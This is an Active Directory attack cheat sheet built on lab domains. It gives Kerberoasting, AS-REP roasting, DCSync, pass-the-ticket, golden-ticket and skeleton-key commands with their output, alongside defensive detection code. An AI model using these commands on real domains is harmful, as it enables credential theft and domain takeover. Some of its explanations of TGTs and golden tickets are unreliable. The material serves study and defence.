
Active Directory - Exploitation

Types of attacks & requirements

  • Kerbrute Enumeration - No domain access required
  • Pass the Ticket - Access as a user to the domain required
  • Kerberoasting - Access as any user required
  • AS-REP Roasting - Access as any user required
  • Golden Ticket - Full domain compromise (domain admin) required
  • Silver Ticket - Service hash required
  • Skeleton Key - Full domain compromise (domain admin) required

AS-REP Roasting

GetNPUsers.py

GetNPUsers.py : Queries the target domain for users with 'Do not require Kerberos preauthentication' set and exports their TGTs for cracking

The only thing that's necessary to query accounts is a valid set of usernames.

$ GetNPUsers.py spookysec.local/ -dc-ip 10.10.169.152 -no-pass -usersfile valid_users.lst
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[-] User james@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-admin@spookysec.local@SPOOKYSEC.LOCAL:6f85816183fca475066c51e9261ec717$eafe07ec0e87349f2ab00582d7becda....
[-] User James@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User robin@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User darkstar@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User administrator@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[...]

Rubeus

PS C:\Users\Administrator\downloads> .\Rubeus.exe asreproast

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0


[*] Action: AS-REP roasting

[*] Target Domain          : CONTROLLER.local

[*] Searching path 'LDAP://CONTROLLER-1.CONTROLLER.local/DC=CONTROLLER,DC=local' for AS-REP roastable users
[*] SamAccountName         : Admin2
[*] DistinguishedName      : CN=Admin-2,CN=Users,DC=CONTROLLER,DC=local
[*] Using domain controller: CONTROLLER-1.CONTROLLER.local (fe80::60bb:a52f:aa60:58c2%5)
[*] Building AS-REQ (w/o preauth) for: 'CONTROLLER.local\Admin2'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

$krb5asrep$Admin2@CONTROLLER.local:B7BF630F74729DA7BFF9E376941F1568$803D834526CFA761F37AF6FE1E967B7F76729FF7EBC9B4A547ACDE739269650C88BDA0E7EAF8CFB1DEF3D19D10271D9E7AE88A8810CCC559CC44EA579FACA294A1903F3983055E44F8964BA8B8528FAA502B4B27DED4B3EA4A9B6E44
...

Cracking AS-REP hash

Hash format :

  • Hashcat ID : 18200
  • Name : Kerberos 5, etype 23, AS-REP

$ john --wordlist=/opt/rockyou.txt --format=krb5asrep asrep.hashes

[...]
Loaded 2 password hashes with 2 different salts (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Pxxxxxxx        ($krb5asrep$23$admin2@CONTROLLER.LOCAL)
Pasxxxxx        ($krb5asrep$23$user3@CONTROLLER.LOCAL)
2g 0:00:00:00 DONE (2022-02-19 14:02) 100.0g/s 51200p/s 102400c/s 102400C/s 123456..moomoo
Use the "--show" option to display all of the cracked passwords reliably
Session completed
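The defender-side view of the same technique, as an added example that is not part of the original page: the two tools above leave Windows Security event 4768 entries with Pre-Authentication Type 0 (no pre-authentication) and, for the crackable etype 23 hashes, Ticket Encryption Type 0x17 (RC4-HMAC). The code assumes 4768 events are available as dicts keyed by the event's XML field names; the sample events, account names and userAccountControl values are constructed for illustration.

```python
from collections import defaultdict

# Constructed sample Windows Security 4768 events (Kerberos authentication
# ticket requested). PreAuthType 0 means the TGT was issued without
# pre-authentication, which is exactly what GetNPUsers.py / Rubeus asreproast
# request; TicketEncryptionType 0x17 is RC4-HMAC, the etype 23 seen in the
# $krb5asrep$23$ hashes above. Status 0x0 is success.
SAMPLE_4768 = [
    {"TargetUserName": "svc-admin", "IpAddress": "10.10.14.5",
     "PreAuthType": 0, "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"TargetUserName": "james", "IpAddress": "10.10.14.5",
     "PreAuthType": 2, "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"TargetUserName": "Admin2", "IpAddress": "10.10.14.5",
     "PreAuthType": 0, "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"TargetUserName": "CONTROLLER-1$", "IpAddress": "::1",
     "PreAuthType": 2, "TicketEncryptionType": "0x12", "Status": "0x0"},
]


def asrep_roast_candidates(events):
    """Map each source address to the accounts for which it obtained a TGT
    without pre-authentication. One source collecting AS-REPs for several
    accounts in a short time is the roasting pattern worth alerting on."""
    hits = defaultdict(set)
    for ev in events:
        if ev["Status"] != "0x0" or ev["PreAuthType"] != 0:
            continue
        hits[ev["IpAddress"]].add(ev["TargetUserName"])
    return {ip: sorted(names) for ip, names in hits.items()}


# Audit side: bit 0x400000 of userAccountControl is DONT_REQ_PREAUTH, which
# GetNPUsers.py reports as UF_DONT_REQUIRE_PREAUTH. Clearing it on every
# account that does not strictly need it removes the attack surface.
UF_DONT_REQUIRE_PREAUTH = 0x400000

# Constructed userAccountControl inventory (account names are assumptions).
SAMPLE_ACCOUNTS = {
    "svc-admin": 0x410200,  # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD | DONT_REQ_PREAUTH
    "james": 0x10200,       # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD
    "Admin2": 0x400200,     # NORMAL_ACCOUNT | DONT_REQ_PREAUTH
}


def accounts_without_preauth(inventory):
    """Return the accounts whose userAccountControl disables pre-authentication."""
    return sorted(name for name, uac in inventory.items()
                  if uac & UF_DONT_REQUIRE_PREAUTH)


if __name__ == "__main__":
    print(asrep_roast_candidates(SAMPLE_4768))
    print(accounts_without_preauth(SAMPLE_ACCOUNTS))
```

The audit function is the cheaper control: an account that still needs the flag (rare legacy clients) should at least have a long random password, since the AS-REP is an offline cracking target for anyone who knows the username.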

User synchronization

secretsdump.py

An account can hold the directory replication permission that lets it synchronize all Active Directory changes, password hashes included, the same way a domain controller does (the DCSync technique). secretsdump.py uses it to retrieve every password hash stored by the domain controller.

$ secretsdump.py -just-dc 'spookysec.local/backup:backup2517860@10.10.169.152'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94...:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[...]
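What the domain controller records when secretsdump.py pulls NTDS.DIT secrets over DRSUAPI, as an added example that is not part of the original page: a Security event 4662 whose Properties list the replication control-access rights, performed by an account that is not a domain controller. The code assumes 4662 events are collected from DCs as dicts keyed by the event's XML field names and that the defender maintains an allowlist of accounts that legitimately replicate; the sample events are constructed, with the non-DC account modelled on the 'backup' user above.

```python
import re

# Extended-rights GUIDs that grant directory replication. Holding the first
# two together is what lets an account pull NTDS.DIT secrets over DRSUAPI,
# as secretsdump.py -just-dc does.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_IN_FILTERED_SET = "89e95b76-444d-4c62-991a-0facbeda640c"
REPLICATION_RIGHTS = {
    DS_REPLICATION_GET_CHANGES,
    DS_REPLICATION_GET_CHANGES_ALL,
    DS_REPLICATION_GET_CHANGES_IN_FILTERED_SET,
}
CONTROL_ACCESS = "0x100"  # AccessMask value for a control-access-right check

GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}")

# Constructed sample 4662 events from a domain controller. The first is a
# DC replicating normally; the second is a regular user account exercising
# replication rights; the third is an unrelated object access whose GUID is
# a placeholder.
SAMPLE_4662 = [
    {"SubjectUserName": "CONTROLLER-1$", "SubjectDomainName": "CONTROLLER",
     "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"SubjectUserName": "backup", "SubjectDomainName": "CONTROLLER",
     "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"SubjectUserName": "james", "SubjectDomainName": "CONTROLLER",
     "AccessMask": "0x10",
     "Properties": "{00000000-0000-0000-0000-000000000000}"},
]


def replication_rights_used(event):
    """Return the replication GUIDs present in a 4662 event's Properties."""
    if event["AccessMask"] != CONTROL_ACCESS:
        return set()
    return REPLICATION_RIGHTS & set(GUID_RE.findall(event["Properties"].lower()))


def dcsync_suspects(events, allowlist):
    """Accounts outside the allowlist (domain controllers and any sanctioned
    synchronisation account) that exercised replication rights."""
    suspects = []
    for ev in events:
        rights = replication_rights_used(ev)
        if rights and ev["SubjectUserName"] not in allowlist:
            who = ev["SubjectDomainName"] + "\\" + ev["SubjectUserName"]
            suspects.append((who, sorted(rights)))
    return suspects


if __name__ == "__main__":
    print(dcsync_suspects(SAMPLE_4662, allowlist={"CONTROLLER-1$"}))
```

Generating 4662 for these rights requires a SACL on the domain object that audits the replication extended rights for Everyone; without it the event never appears. The same GUIDs are what to audit in the domain's ACL when hunting for accounts like 'backup' that were granted them by mistake.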

TGT Harvesting

Rubeus

PS C:\Users\Administrator\Downloads> echo 10.10.27.87 CONTROLLER.local >> C:\Windows\System32\drivers\etc\hosts
PS C:\Users\Administrator\Downloads> .\Rubeus.exe harvest /interval:30

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0

[*] Action: TGT Harvesting (with auto-renewal)
[*] Monitoring every 30 seconds for new TGTs
[*] Displaying the working TGT cache every 30 seconds


[*] Refreshing TGT ticket cache (2/16/2022 2:24:55 AM)

  User                  :  CONTROLLER-1$@CONTROLLER.LOCAL
  StartTime             :  2/16/2022 2:21:27 AM
  EndTime               :  2/16/2022 12:21:27 PM
  RenewTill             :  2/23/2022 2:21:27 AM
  Flags                 :  name_canonicalize, pre_authent, initial, renewable, forwardable
  Base64EncodedTicket   :

doIFhDCCBYCgAwIBBaEDAgEWooIEeDCCBHRhggRwMIIEbKADAgEFoRIbEENPTlRST0xMRVIuTE9DQUyiJTAjoAMCAQKhHDAaGwZrcmJ0Z3QbEENPTlRST0xMRVIuTE9DQUyjggQoMIIEJKADAgESoQMCAQKiggQWBIIEEueRiBvsfWfw5vXb+yejoKPQzf8SXoEhLXFQ4p6w+XFFYavlaEHP5JcNEa0/M/5fxsZRQ9frEU89p/NakhpMmoEe...

Kerberoasting

Kerberoasting lets any domain user request a service ticket for any service that has a registered SPN and then crack that ticket offline to recover the service account's password. Any account with a registered SPN is Kerberoastable; whether the attack pays off depends on how strong the password is (and so whether it is crackable) and on the privileges the cracked service account holds.

You can use BloodHound to find all Kerberoastable accounts.

Rubeus

PS C:\Users\Administrator\Downloads> .\Rubeus.exe kerberoast

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Searching the current domain for Kerberoastable users

[*] Total kerberoastable users : 2


[*] SamAccountName         : SQLService
[*] DistinguishedName      : CN=SQLService,CN=Users,DC=CONTROLLER,DC=local
[*] ServicePrincipalName   : CONTROLLER-1/SQLService.CONTROLLER.local:30111
[*] PwdLastSet             : 5/25/2020 10:28:26 PM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash                   : $krb5tgs$23$*SQLService$CONTROLLER.local$CONTROLLER-1/SQLService.CONTROLLER.local:30111*$55970F3E577E752C4AF3862B0E336AAF$2C99AE6E2322400632AFDDCD49A56F83D6F0279E5E5A7754E6B6E2E1CD62A4603BD03D5999625F25D178D6A6572F7DBEC6D7A57407E7F343E8EFF6B8DF1ECCCF946F55ADEB22CB9D04E47425AAB62EFA960920E3644F55253420C1...

GetUserSPNs.py

$ GetUserSPNs.py controller.local/Machine1:Password1 -dc-ip 10.10.190.181 -request
[...]

CONTROLLER-1/SQLService.CONTROLLER.local:30111   SQLService   CN=Group Policy Creator Owners,OU=Groups,DC=CONTROLLER,DC=local  2020-05-26 00:28:26.922527  2020-05-26 00:46:42.467441
CONTROLLER-1/HTTPService.CONTROLLER.local:30222  HTTPService  2020-05-26 00:39:17.578393  2020-05-26 00:40:14.671872

$krb5tgs$23$*SQLService$CONTROLLER.LOCAL$controller.local/SQLService*$9c27c3c5bd692413044c5114c83dfc48$6500e8fc7a747f009af4b3c98b08f07c50db3954892bcd1f0a600aad5
...
$krb5tgs$23$*HTTPService$CONTROLLER.LOCAL$controller.local/HTTPService*$30f8b71d5d8b32488f11c72ba53433fc$ead6150959e1c10224970d24997a8fc4bf05293d90e589206aa62aa
...

Cracking TGS ticket

$ hashcat -m 13100 -a 0 krb5tgs.hash /opt/rockyou.txt
...
$ john --wordlist=/opt/rockyou.txt --format=krb5tgs krb5tgs.hash
...

After cracking

If the service account is a domain admin :

  • dump NTDS.dit

If the service account is not a domain admin :

  • pivot or escalate
  • password spraying
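Detecting the Kerberoasting steps above from the domain controller's side, as an added example that is not part of the original page: every ticket Rubeus or GetUserSPNs.py requests produces a Security event 4769, and the $krb5tgs$23$ hashes correspond to Ticket Encryption Type 0x17 (RC4). The code assumes 4769 events are available as dicts keyed by the event's XML field names; the sample events are constructed, with the requester modelled on the Machine1 account used above.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample 4769 events (Kerberos service ticket requested).
# TicketEncryptionType 0x17 is RC4-HMAC (the $krb5tgs$23$ hashes above);
# 0x12 is AES256. Machine accounts and krbtgt are excluded from the
# roasting logic because their tickets are not crackable service passwords.
SAMPLE_4769 = [
    {"TimeCreated": "2022-02-19T14:00:01", "TargetUserName": "Machine1@CONTROLLER.LOCAL",
     "ServiceName": "SQLService", "IpAddress": "10.10.14.5",
     "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"TimeCreated": "2022-02-19T14:00:02", "TargetUserName": "Machine1@CONTROLLER.LOCAL",
     "ServiceName": "HTTPService", "IpAddress": "10.10.14.5",
     "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"TimeCreated": "2022-02-19T14:00:03", "TargetUserName": "Machine1@CONTROLLER.LOCAL",
     "ServiceName": "krbtgt", "IpAddress": "10.10.14.5",
     "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"TimeCreated": "2022-02-19T09:12:40", "TargetUserName": "james@CONTROLLER.LOCAL",
     "ServiceName": "SQLService", "IpAddress": "10.10.14.9",
     "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"TimeCreated": "2022-02-19T09:30:00", "TargetUserName": "james@CONTROLLER.LOCAL",
     "ServiceName": "CONTROLLER-1$", "IpAddress": "10.10.14.9",
     "TicketEncryptionType": "0x12", "Status": "0x0"},
]


def kerberoast_suspects(events, window=timedelta(minutes=5), min_services=2,
                        require_rc4=True):
    """Return {(requester, source_ip): [services]} for requesters that obtained
    service tickets for at least `min_services` distinct user-account services
    within `window`. With require_rc4 only 0x17 tickets count; set it False to
    also catch roasting of AES-enabled accounts (see the Rubeus NOTICE above).
    One RC4 request, like james above, is normal for a legacy service; a burst
    across many SPNs is the roasting pattern."""
    by_requester = defaultdict(list)
    for ev in events:
        if ev["Status"] != "0x0":
            continue
        if require_rc4 and ev["TicketEncryptionType"] != "0x17":
            continue
        svc = ev["ServiceName"]
        if svc.lower() == "krbtgt" or svc.endswith("$"):
            continue
        key = (ev["TargetUserName"], ev["IpAddress"])
        by_requester[key].append((datetime.fromisoformat(ev["TimeCreated"]), svc))

    alerts = {}
    for key, requests in by_requester.items():
        requests.sort()
        for i, (t0, _) in enumerate(requests):
            in_window = {svc for t, svc in requests[i:] if t - t0 <= window}
            if len(in_window) >= min_services:
                alerts[key] = sorted(in_window)
                break
    return alerts


if __name__ == "__main__":
    print(kerberoast_suspects(SAMPLE_4769))
```

A low-noise companion to this rule is a honey SPN: a service account nobody uses whose ticket is never legitimately requested, so any 4769 for it is an alert on its own. On the hardening side, the "After cracking" branch only matters if the service account password is weak; long random passwords (or group Managed Service Accounts) make the recovered hash worthless.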

Pass the Ticket

  • Dump TGTs from LSASS memory with mimikatz.
  • The attack lets you escalate to domain admin if you dump a domain admin's ticket and then inject it with mimikatz's PTT (pass-the-ticket) module, allowing you to act as that domain admin.

Mimikatz

Administrator privilege is required to run mimikatz.

PS C:\Users\Administrator\downloads> .\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 May 19 2020 00:48:59
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::tickets /export

Authentication Id : 0 ; 602549 (00000000:000931b5)
Session           : Network from 0
User Name         : CONTROLLER-1$
Domain            : CONTROLLER
Logon Server      : (null)
Logon Time        : 2/19/2022 4:17:32 AM
SID               : S-1-5-18

         * Username : CONTROLLER-1$
         * Domain   : CONTROLLER.LOCAL
[...]

# Tickets are dumped as .kirbi files into your current directory.
PS C:\Users\Administrator\Downloads> dir

    Directory: C:\Users\Administrator\Downloads


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        5/25/2020   3:45 PM        1263880 mimikatz.exe
-a----        2/19/2022   5:10 AM        1595 [0;517c3]-2-0-40e10000-Administrator@krbtgt-CONTROLLER.LOCAL.kirbi

mimikatz # kerberos::ptt [0;517c3]-2-0-40e10000-Administrator@krbtgt-CONTROLLER.LOCAL.kirbi

* File: '[0;517c3]-2-0-40e10000-Administrator@krbtgt-CONTROLLER.LOCAL.kirbi': OK

The ticket is now injected into your logon session, giving you the same rights as the account whose TGT you imported.

PS C:\Users\Administrator\Downloads> klist

Current LogonId is 0:0x517c3

Cached Tickets: (1)

#0>     Client: Administrator @ CONTROLLER.LOCAL
        Server: krbtgt/CONTROLLER.LOCAL @ CONTROLLER.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 2/19/2022 4:15:06 (local)
        End Time:   2/19/2022 14:15:06 (local)
        Renew Time: 2/26/2022 4:15:06 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:

Golden / Silver Ticket Attacks

Silver vs Golden Ticket :

  • Silver ticket is limited to one specific service.
  • Golden ticket has access to any Kerberos service.

KRBTGT vs TGT :

  • A KRBTGT is the service account for the KDC that issues all of the tickets to the clients.
  • A TGT is a ticket to a service account issued by the KDC and can only access a specific service.

Golden ticket attack :

A golden ticket attack works by dumping the ticket-granting ticket of any user on the domain (preferably the domain admin).

  • Golden ticket : dump the krbtgt ticket
  • Silver ticket : dump any service or domain admin ticket

This provides the service/domain admin account's SID (Security Identifier, a unique identifier) and NTLM hash. You then use these details in a mimikatz golden ticket attack to create a TGT that impersonates the given service account.

Mimikatz

PS C:\Users\Administrator\Downloads> .\mimikatz.exe
[...]
mimikatz # privilege::debug
Privilege '20' OK

mimikatz # lsadump::lsa /inject /name:krbtgt    <- name of the account
Domain : CONTROLLER / S-1-5-21-432953485-3795405108-1502158860

RID  : 000001f6 (502)
User : krbtgt

 * Primary
    NTLM : 72cd714611b64cd4d5550cd2759db3f6
    LM   :
  Hash NTLM: 72cd714611b64cd4d5550cd2759db3f6
    ntlm- 0: 72cd714611b64cd4d5550cd2759db3f6
    lm  - 0: aec7e106ddd23b3928f7b530f60df4b6

[...]
mimikatz # Kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-432953485-3795405108-1502158860 /krbtgt:72cd714611b64cd4d5550cd2759db3f6 /id:1103
User      : Administrator
Domain    : controller.local (CONTROLLER)
SID       : S-1-5-21-432953485-3795405108-1502158860
User Id   : 1103
Groups Id : *513 512 520 518 519
ServiceKey: 72cd714611b64cd4d5550cd2759db3f6 - rc4_hmac_nt
Lifetime  : 2/19/2022 5:44:07 AM ; 2/17/2032 5:44:07 AM ; 2/17/2032 5:44:07 AM
-> Ticket : ticket.kirbi

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !

mimikatz # misc::cmd
Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00007FF64F9443B8
# misc::cmd opens an elevated command prompt that carries the ticket injected by mimikatz.
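A triage check that serves both the Pass the Ticket section (the klist output there shows a normal TGT) and the golden ticket above, as an added example that is not part of the original page: mimikatz prints a ten-year lifetime for the forged ticket and encrypts it with rc4_hmac_nt, whereas a TGT issued by the KDC honours the domain's Kerberos policy (Windows defaults: 10 hours maximum ticket age, 7 days maximum renewal age). The code parses klist-style output; the sample text is constructed, with ticket #0 modelled on the klist output shown earlier and ticket #1 on the golden ticket lifetime printed above.

```python
import re
from datetime import datetime, timedelta

# Constructed klist-style output. Ticket #0 is modelled on the legitimate
# TGT shown in the Pass the Ticket section (10 h lifetime, 7 d renewal);
# ticket #1 carries the 10-year lifetime mimikatz printed for the golden ticket.
SAMPLE_KLIST = """
#0>     Client: Administrator @ CONTROLLER.LOCAL
        Server: krbtgt/CONTROLLER.LOCAL @ CONTROLLER.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Start Time: 2/19/2022 4:15:06 (local)
        End Time:   2/19/2022 14:15:06 (local)
        Renew Time: 2/26/2022 4:15:06 (local)

#1>     Client: Administrator @ CONTROLLER.LOCAL
        Server: krbtgt/CONTROLLER.LOCAL @ CONTROLLER.LOCAL
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Start Time: 2/19/2022 5:44:07 (local)
        End Time:   2/17/2032 5:44:07 (local)
        Renew Time: 2/17/2032 5:44:07 (local)
"""

# One "Field: value" line; the first line of a ticket is prefixed with "#N>".
FIELD_RE = re.compile(
    r"^\s*(?:#\d+>\s*)?(Client|Server|KerbTicket Encryption Type|Start Time|End Time|Renew Time):\s*(.+?)\s*$",
    re.M)
TIME_FMT = "%m/%d/%Y %H:%M:%S"


def _parse_time(value):
    return datetime.strptime(value.replace("(local)", "").strip(), TIME_FMT)


def parse_klist(text):
    """Split klist output into one dict per cached ticket."""
    tickets = []
    for block in re.split(r"^(?=#\d+>)", text.strip(), flags=re.M):
        if not block.strip():
            continue
        fields = dict(FIELD_RE.findall(block))
        tickets.append({
            "client": fields["Client"],
            "server": fields["Server"],
            "etype": fields.get("KerbTicket Encryption Type", ""),
            "start": _parse_time(fields["Start Time"]),
            "end": _parse_time(fields["End Time"]),
            "renew": _parse_time(fields["Renew Time"]),
        })
    return tickets


def suspicious_tickets(tickets, max_ticket_age=timedelta(hours=10),
                       max_renew_age=timedelta(days=7)):
    """Flag tickets whose lifetime or renewal window exceeds the domain's
    Kerberos policy (defaults are the Windows defaults), or whose TGT uses RC4
    in a domain where AES is the norm. Each is a golden ticket tell."""
    flagged = []
    for t in tickets:
        reasons = []
        if t["end"] - t["start"] > max_ticket_age:
            reasons.append("lifetime exceeds policy")
        if t["renew"] - t["start"] > max_renew_age:
            reasons.append("renewal window exceeds policy")
        if "RC4" in t["etype"]:
            reasons.append("RC4 ticket in AES domain")
        if reasons:
            flagged.append((t["client"], t["server"], reasons))
    return flagged


if __name__ == "__main__":
    for client, server, reasons in suspicious_tickets(parse_klist(SAMPLE_KLIST)):
        print(client, server, reasons)
```

The same checks apply to exported .kirbi files, since the lifetime and encryption type are in the ticket itself. The only remediation for a forged TGT is resetting the krbtgt password twice (the KDC honours the previous key for existing tickets until the second reset), which invalidates every golden ticket built from the dumped hash.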

Skeleton Key

  • NTLM hash of the default mimikatz skeleton key password ("mimikatz") : 60BA4FCADC466C7A033C178194C03DF6

The skeleton key works by abusing the AS-REQ encrypted timestamp. The timestamp is encrypted with the user's NT hash, and the domain controller normally tries to decrypt it with that same NT hash. Once a skeleton key is implanted, the domain controller tries to decrypt the timestamp with both the user's NT hash and the skeleton key's NT hash, allowing you access to the domain forest with the skeleton key password.

Mimikatz

PS C:\Users\Administrator\Downloads> .\mimikatz.exe
[...]
mimikatz # privilege::debug
Privilege '20' OK

mimikatz # misc::skeleton
[KDC] data
[KDC] struct
[KDC] keys patch OK
[RC4] functions
[RC4] init patch OK
[RC4] decrypt patch OK

Access shares :

C:\Users\Administrator\Downloads>net use \\10.10.188.30\admin$ /user:Administrator mimikatz
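One indicator a defender can use for the skeleton key, as an added example that is not part of the original page: the mimikatz patch hooks the RC4 path (the [RC4] lines above), so logons that go through the skeleton key are pre-authenticated logons served with RC4 (Ticket Encryption Type 0x17 in event 4768) for accounts that support AES, and they cluster on the one domain controller holding the patch in memory. The code assumes 4768 events are available as dicts keyed by the event's XML field names plus the DC's Computer name, and an export of each account's msDS-SupportedEncryptionTypes; events and account names are constructed.

```python
from collections import defaultdict

# msDS-SupportedEncryptionTypes bits.
RC4_HMAC = 0x4
AES128 = 0x8
AES256 = 0x10

# Constructed inventory of which encryption types each account supports
# (account names are assumptions). 'legacyapp' is RC4-only, so RC4 logons
# for it are expected and must not fire.
SUPPORTED_ETYPES = {
    "Administrator": RC4_HMAC | AES128 | AES256,
    "james": RC4_HMAC | AES128 | AES256,
    "legacyapp": RC4_HMAC,
}

# Constructed 4768 events. PreAuthType 2 is PA-ENC-TIMESTAMP, the encrypted
# timestamp described above. 'Computer' is the DC that answered; the skeleton
# key lives in one DC's memory, so hits should group by DC. Status 0x18 is a
# failed pre-authentication and is ignored.
SAMPLE_4768 = [
    {"Computer": "CONTROLLER-1.CONTROLLER.local", "TargetUserName": "Administrator",
     "IpAddress": "10.10.14.5", "PreAuthType": 2, "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"Computer": "CONTROLLER-1.CONTROLLER.local", "TargetUserName": "james",
     "IpAddress": "10.10.14.20", "PreAuthType": 2, "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"Computer": "CONTROLLER-1.CONTROLLER.local", "TargetUserName": "legacyapp",
     "IpAddress": "10.10.14.30", "PreAuthType": 2, "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"Computer": "CONTROLLER-1.CONTROLLER.local", "TargetUserName": "james",
     "IpAddress": "10.10.14.5", "PreAuthType": 2, "TicketEncryptionType": "0x17", "Status": "0x18"},
]


def rc4_downgrade_logons(events, supported_etypes):
    """Return {dc: sorted accounts} for successful pre-authenticated logons
    that were served with RC4 although the account supports AES. A sudden
    run of these on a single DC, for accounts that never used RC4 before, is
    the documented skeleton key signature; a single hit can also be a client
    misconfiguration, so the DC grouping is what makes it actionable."""
    hits = defaultdict(set)
    for ev in events:
        if ev["Status"] != "0x0" or ev["PreAuthType"] != 2:
            continue
        if ev["TicketEncryptionType"] != "0x17":
            continue
        if supported_etypes.get(ev["TargetUserName"], 0) & (AES128 | AES256):
            hits[ev["Computer"]].add(ev["TargetUserName"])
    return {dc: sorted(users) for dc, users in hits.items()}


if __name__ == "__main__":
    print(rc4_downgrade_logons(SAMPLE_4768, SUPPORTED_ETYPES))
```

Because the patch is in-memory, rebooting the domain controller removes it; the lasting fix is protecting LSASS on DCs (RunAsPPL) so that mimikatz cannot patch it without a driver, and alerting on the debug privilege use that precedes the misc::skeleton command.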
